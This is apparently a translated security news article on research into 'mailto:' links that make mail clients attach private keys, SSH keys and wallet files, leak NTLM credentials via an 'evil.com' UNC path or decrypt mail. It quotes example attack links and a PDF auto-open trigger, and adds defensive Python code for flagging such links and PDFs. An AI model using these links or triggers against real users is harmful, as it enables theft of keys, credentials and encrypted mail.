Attacking e-mail users through "mailto:" links

Researchers from Ruhr University Bochum (Germany) analysed (PDF) how mail clients process "mailto:" links that carry extended parameters. Five of the twenty mail clients examined were vulnerable to an attack that abuses the "attach" parameter to smuggle resources into a message. Six further clients were vulnerable to substitution of PGP and S/MIME keys, and three clients were vulnerable to an attack that extracts the plaintext of encrypted messages.

"mailto:" links are used to automatically open the mail client to compose a message to the recipient named in the link. Besides the address, further parameters can be given as part of the link, such as the subject of the message and a template for its body. The attack relies on the "attach" parameter, which lets the link attach a file to the message being composed.

The mail clients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) and Pegasus Mail were vulnerable to a trivial attack that automatically attaches any local file named in a link of the form "mailto:?attach=path_to_file". The file is attached without any warning, so unless the user pays particular attention they will not notice that the message is about to be sent with an attachment.

For example, a link such as "mailto:[email protected]?subject=Title&body=Text&attach=~/.gnupg/secring.gpg" attaches the user's GnuPG private keyring to the message. In the same way one can exfiltrate crypto-currency wallets (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) and any other file the user can read. Thunderbird additionally allowed whole groups of files to be attached with a wildcard, using constructs such as "attach=/tmp/*.txt".

Besides local files, some mail clients also process links to network shares and to paths on the IMAP server. In particular, IBM Notes fetches a file from a network share when handling a link such as "attach=\\evil.com\dummyfile", which also allows NTLM authentication material to be captured by pointing the link at an attacker-controlled SMB server (the request is sent with the user's current credentials).

Thunderbird successfully processed requests such as "attach=imap:///fetch>UID>/INBOX>1/", which allow the contents of folders on the IMAP server to be attached. Moreover, messages retrieved from IMAP that were encrypted with OpenPGP or S/MIME were automatically decrypted by the mail client before being sent. The Thunderbird developers were notified of the problem in February, and it is already fixed in Thunderbird 78 (the Thunderbird 52, 60 and 68 branches remain vulnerable).
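The paragraphs above describe what a client should refuse to honour in a "mailto:" link: "attach" values that name local files, wildcards, UNC paths to SMB servers and imap:// URLs. The following added example (not code from the paper or from any of the mail clients named) shows the check a client or a mail gateway could apply. It parses the link according to RFC 6068, keeps only the header fields a link may legitimately pre-fill (that allow-list is this example's assumption) and classifies every "attach" value by the attack class it corresponds to. The sample links are the ones quoted in the article.

```python
"""Parse a mailto: URL and flag parameters a mail client should not honour.

Added example, not the paper's or any client's code. SAFE_FIELDS is an
assumption about sane client behaviour, not a list taken from any RFC.
"""
import re
from urllib.parse import unquote

# Header fields a link may legitimately pre-fill (assumed allow-list).
SAFE_FIELDS = {"to", "cc", "bcc", "subject", "body", "in-reply-to"}

# A real URL scheme is at least two characters, so "C:\..." is not mistaken
# for a scheme and is treated as a local path instead.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]+:", re.I)


def parse_mailto(url: str) -> dict:
    """Split a mailto: URL into its fields (RFC 6068 syntax).

    The address part ends at the first '?'; header fields follow, separated
    by '&', percent-encoded, with case-insensitive names. Repeated fields are
    kept as a list so a second attach= cannot hide behind the first.
    """
    if not url.lower().startswith("mailto:"):
        raise ValueError("not a mailto: URL")
    to_part, _, query = url[len("mailto:"):].partition("?")
    fields: dict = {}
    if to_part:
        fields["to"] = [unquote(to_part)]
    for pair in filter(None, query.split("&")):
        name, _, value = pair.partition("=")
        fields.setdefault(unquote(name).lower(), []).append(unquote(value))
    return fields


def classify_attach(value: str) -> str:
    """Name the attack class an attach= value corresponds to."""
    v = value.strip()
    if v.startswith("\\\\") or v.startswith("//"):
        return "unc-path"      # \\evil.com\file: SMB fetch, NTLM leak
    if SCHEME_RE.match(v):
        return "remote-url"    # imap:///fetch>UID>/INBOX>1/, file://, ...
    if any(ch in v for ch in "*?["):
        return "wildcard"      # /tmp/*.txt attaches a whole directory
    return "local-file"        # ~/.gnupg/secring.gpg, ~/.ssh/id_rsa


def check_mailto(url: str) -> dict:
    """Return the fields safe to pre-fill plus a finding for each rejected one."""
    fields = parse_mailto(url)
    findings = []
    for name, values in fields.items():
        if name in SAFE_FIELDS:
            continue
        for v in values:
            kind = classify_attach(v) if name == "attach" else "unknown-field"
            findings.append((name, kind, v))
    allowed = {k: v for k, v in fields.items() if k in SAFE_FIELDS}
    return {"allowed": allowed, "findings": findings, "safe": not findings}


if __name__ == "__main__":
    for link in (
        "mailto:?subject=Title&body=Text",
        "mailto:?attach=~/.gnupg/secring.gpg",
        "mailto:?attach=%5C%5Cevil.com%5Cdummyfile",
        "mailto:?attach=imap:///fetch>UID>/INBOX>1/",
        "mailto:?attach=/tmp/*.txt",
    ):
        print(link, "->", check_mailto(link)["findings"] or "ok")
```

The point of keeping every field as a list is visible in the last check: a link that repeats "attach" twice produces two findings, and a client that only looked at the first occurrence would still let the second file through. Percent-decoding before classification matters for the UNC case, since "\\" is normally encoded as "%5C%5C" in a link.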

Older versions of Thunderbird were also vulnerable to two further attack variants against PGP and S/MIME presented by the researchers. In particular Thunderbird, as well as Outlook, PostBox, eM Client, MailMate and R2Mail2, was affected by a key-substitution attack: because the client automatically imports and installs new certificates delivered in S/MIME messages, an attacker can arrange to replace public keys the user has already stored.

The second attack, to which Thunderbird, PostBox and MailMate were susceptible, exploits the draft auto-save mechanism: using mailto parameters it triggers the decryption of encrypted messages, or the addition of a digital signature to arbitrary messages, and then has the result delivered to an IMAP server run by the attacker. In this attack the ciphertext is passed through the "body" parameter, and a "meta refresh" tag is used to trigger the connection to the attacker's IMAP server.

Specially crafted PDF documents can be used to have "mailto:" links processed without any action by the user: the OpenAction entry in a PDF launches the mailto handler as soon as the document is opened:

%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=-----BEGIN PGP MESSAGE-----[…]) >>
endobj

% trailer added so a reader can locate the catalog without an xref table
trailer << /Root 1 0 R >>
%%EOF
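A mail gateway or a desktop scanner that wants to catch the PDF trigger shown above can look for a catalog whose /OpenAction resolves to a /URI action with a mailto: target. The following added example (not from the article or the paper) does exactly that with a plain text scan over the PDF bytes; the sample documents are constructed here to mirror the article's snippet. Handling of object streams, encryption and incremental updates is deliberately left out, and that limitation is an assumption of this example, not a property of the attack.

```python
"""Find mailto: URIs that a PDF would open automatically via /OpenAction.

Added example, not code from the article or the paper. Plain text scan only:
object streams and encrypted PDFs are out of scope (assumption).
"""
import re

# "n g obj ... endobj" bodies, keyed by object number.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)
# /OpenAction as [n g R], as n g R, or as an inline << ... >> dictionary.
OPENACTION_RE = re.compile(
    rb"/OpenAction\s*(?:\[\s*(\d+)\s+\d+\s+R\s*\]|(\d+)\s+\d+\s+R|(<<.*?>>))", re.S)
URI_ACTION_RE = re.compile(rb"/S\s*/URI\b")
# /URI (literal string) with PDF backslash escapes allowed inside the parens.
URI_VALUE_RE = re.compile(rb"/URI\s*\(((?:\\.|[^)\\])*)\)", re.S)

_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f",
            "(": "(", ")": ")", "\\": "\\"}


def _unescape(raw: bytes) -> str:
    """Undo the backslash escapes of a PDF literal string."""
    text = raw.decode("latin-1")
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), text)


def find_open_mailto(pdf: bytes) -> list:
    """Return every mailto: URI reachable from an /OpenAction entry."""
    objects = {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}
    hits = []
    for m in OPENACTION_RE.finditer(pdf):
        num = m.group(1) or m.group(2)
        action = objects.get(int(num), b"") if num else m.group(3)
        if not URI_ACTION_RE.search(action):
            continue                      # GoTo, JavaScript, ... not our concern here
        for u in URI_VALUE_RE.finditer(action):
            uri = _unescape(u.group(1))
            if uri.lower().startswith("mailto:"):
                hits.append(uri)
    return hits


# Constructed samples, shaped like the article's snippet.
MALICIOUS_PDF = b"""%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Type /Action /S /URI /URI (mailto:?body=text&attach=~/.gnupg/secring.gpg) >>
endobj
trailer << /Root 1 0 R >>
%%EOF
"""

BENIGN_PDF = b"""%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction << /S /URI /URI (https://example.org/) >> >>
endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    print(find_open_mailto(MALICIOUS_PDF))   # the mailto: trigger
    print(find_open_mailto(BENIGN_PDF))      # []
```

Any hit from this scan can be fed to a mailto: parameter check such as the one earlier in this article; a URI that carries "attach" is the case the paper describes, but the combination of OpenAction and mailto: is itself suspicious enough to quarantine, since no legitimate document needs to start composing mail the moment it is opened.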


Source: opennet.ru
